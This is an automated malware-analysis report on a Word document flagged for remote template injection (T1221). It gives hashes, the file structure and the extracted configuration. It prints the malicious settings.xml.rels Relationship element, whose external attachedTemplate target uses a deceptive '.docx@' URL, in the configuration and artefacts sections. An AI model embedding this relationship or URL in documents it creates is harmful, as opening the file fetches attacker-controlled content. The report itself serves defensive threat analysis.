Malicious
Malicious

f72e6695b9c92e4dabacd607ceccd4b4

MS Word Document
|
MD5: f72e6695b9c92e4dabacd607ceccd4b4
|
Size: 60.24 KB
|
application/msword

Office Document
Remote Template Injection
T1221
Moderately Suspicious Document

Print
General
Structural Analysis
Config.1
Yara Rules9
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
f72e6695b9c92e4dabacd607ceccd4b4
Sha1
b811ce32b82a8879e79d099c70ed28c06765010f
Sha256
18c13bdcb3f94ccf6d99ce3f0df1b7ac1d077f861106130ae730efdacb11202f
Sha384
fa5fc90431555b35998024e2fe12d959ea1975183f961785eb84aa4413ddcdf854c25acaaff216b6f69247d2ac090620
Sha512
8b0a47b0cf2634da2e0ece48907ed5a32c031a9833c9552a579004d3692e3453a90f311c0eef66d17463577bd5d45eda0709a4fa7e2313e2dae23198a79f3362
SSDeep
1536:iqH6SGUkbPVhPwTmSypv4C1nYLOijqVxzLvG9KNrwgQyD2ze+T:ilSUbTwXyB4Qn6PKzzGKMqXq
TLSH
E643F15EA0ED14E8D2026277D8BD7E68F72C71478253A103E5321E6DEFFF8C9961A205
File Structure
f72e6695b9c92e4dabacd607ceccd4b4
Office Document
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
[Content_Types].xml
Xml
_rels
.rels
Xml
word
Malicious
_rels
Malicious
document.xml.rels
Xml
header2.xml.rels
Xml
footer2.xml.rels
Xml
settings.xml.rels
Xml
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
document.xml
Xml
footnotes.xml
Xml
footer2.xml
Xml
footer3.xml
Xml
header3.xml
Xml
endnotes.xml
Xml
header2.xml
Xml
media
image1.emf
image2.emf
embeddings
Microsoft_Office_Excel_Worksheet1.xlsx
Office Document
[Content_Types].xml
Xml
_rels
.rels
Xml
xl
_rels
workbook.xml.rels
Xml
workbook.xml
Xml
sharedStrings.xml
Xml
worksheets
_rels
sheet1.xml.rels
Xml
sheet1.xml
Xml
theme
theme1.xml
Xml
styles.xml
Xml
printerSettings
printerSettings1.bin
customXml
itemProps2.xml
Xml
_rels
item3.xml.rels
Xml
item2.xml.rels
Xml
item1.xml.rels
Xml
item1.xml
Xml
itemProps1.xml
Xml
itemProps3.xml
Xml
item3.xml
Xml
item2.xml
Xml
docProps
thumbnail.wmf
core.xml
Xml
app.xml
Xml
custom.xml
Xml
Microsoft_Office_Excel_Worksheet2.xlsx
Office Document
[Content_Types].xml
Xml
xl
_rels
workbook.xml.rels
Xml
workbook.xml
Xml
styles.xml
Xml
worksheets
sheet2.xml
Xml
sheet1.xml
Xml
theme
theme1.xml
Xml
sharedStrings.xml
Xml
printerSettings
printerSettings1.bin
docProps
thumbnail.wmf
core.xml
Xml
app.xml
Xml
custom.xml
Xml
theme
theme1.xml
Xml
settings.xml
Xml
styles.xml
Xml
webSettings.xml
Xml
fontTable.xml
Xml
docProps
app.xml
Xml
core.xml
Xml
Malware Configuration - Remote Template
Config. Field
Value
Target

https://wishyouthebestpeoplesentiretiimeforfigureoutthebestsolutionsgiveme.docx@bersatu.me/5LgsMd

Path

settings.xml.rels

XPath

/Relationships/Relationship

Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://wishyouthebestpeoplesentiretiimeforfigureoutthebestsolutionsgiveme.docx@bersatu.me/5LgsMd" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />

Artefacts
Name
Value
Remote Template - Highly Suspicious

https://wishyouthebestpeoplesentiretiimeforfigureoutthebestsolutionsgiveme.docx@bersatu.me/5LgsMd

f72e6695b9c92e4dabacd607ceccd4b4 (60.24 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙